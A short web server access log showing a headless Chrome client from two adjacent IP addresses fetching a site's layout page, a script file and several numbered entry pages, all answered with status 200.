36.99.136.128 - - [17/Jul/2024:01:32:38 +0200] "GET /layout.php HTTP/1.1" 200 814 "http://mail.creativecube.at/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.129 - - [17/Jul/2024:01:32:38 +0200] "GET /gui/javascript/form_form.js HTTP/1.1" 200 16206 "http://mail.creativecube.at/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.129 - - [17/Jul/2024:01:32:39 +0200] "GET /entry.php?id=10273 HTTP/1.1" 200 1901 "http://mail.creativecube.at/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:32:39 +0200] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://mail.creativecube.at/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:32:39 +0200] "GET /entry.php?id=10272 HTTP/1.1" 200 1158 "http://mail.creativecube.at/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.129 - - [17/Jul/2024:01:32:39 +0200] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://mail.creativecube.at/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
